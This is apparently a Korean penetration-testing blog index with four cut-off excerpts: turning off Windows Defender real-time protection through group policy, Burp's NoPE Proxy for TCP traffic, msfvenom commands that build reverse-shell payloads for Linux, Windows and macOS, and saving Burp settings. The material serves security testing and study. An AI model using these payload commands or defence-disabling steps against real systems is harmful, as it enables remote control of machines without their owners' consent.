모의해킹을 하면 어쩔수없이 쉘코드가 포함된 파일이라던지 여러 도구들 때문에 실시간 보호에 자주 걸리는데... 이게 은근 스트레스이다. 다운로드도 못받게하질 않나 자기 멋대로 지우질 않나 그래서 임시방편으로 끄게되면 재부팅 후 다른 옵션들은 다 꺼져있는데 유독 실시간 보호만 자동으로 다시 켜져있다 ​ 구글링 해봤더니 레지스트리를 편집하고 로컬 그룹 정책 편집에서 마이크로소프트 백신 끄기를 사용으로 바꾸고 2가지 방법이 검색이 많이됐는데 해봤는데 안됨... 근데 로컬 정책 편집에서 눈에 띄는 단어가 있어 그걸 켰더니 되었다. 일단 Win+R gpedit.msc 접근 컴퓨터 구성 -> 관리 템플릿 -> Windows 구성 요소 -> Microsoft Defender 바이러스 백신 까지가 이제 구글링했을 때 나..

앱이나 웹 또는 CS 프로그램 등 진단을 하다보면 HTTP 통신이 아니라 TCP로 통신하여 일반적인 프록시 방법으로 패킷 캡처가 안되는 경우가 종종 있다. TCP 패킷은 WireShark로 캡처했을 때 아래 그림처럼 확인할 수 있는데 이 TCP 패킷을 버프로 캡처하여 변조하고 분석하려면 NopE Proxy라는 확장 프로그램이 필요하다 https://github.com/portswigger/nope-proxy GitHub - PortSwigger/nope-proxy: Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite. Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite. - Git..

악성프로그램을 직접 코드 하나하나 짜서 만들 능력은 없지만, 베놈과 메타스플로잇을 이용하여 악성프로그램을 만들어 테스트해보고 어떤 일들이 가능한지 알아볼 수 있다. venom 페이로드 # 리눅스 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf # 윈도우 msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe # 맥 msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho # 리눅스 쉘코드 msfvenom -p linux/x86/meterpreter/reve..

웹 해킹을 할 때 그냥 필수적으로 무조건 켜야하는 것중 하나가 버프슈트다. 하지만 켤 때마다 프록시 잡아주고 옵션 설정 건드려주고 포트 설정하고 하는 것은 너무나도 귀찮다. 이 모든 설정을 저장해두고 버프를 실행할 때 불러오는 방법이 있다. 메뉴 -> Project -> Project options -> Save project options 프로젝트 저장 기능을 이용하여 json 파일로 설정을 저장해주면 버프를 켤 때 이렇게 json 파일을 불러와 버프를 실행 시킬 수 있다. 그럼 저장했던 그대로의 설정으로 실행된다.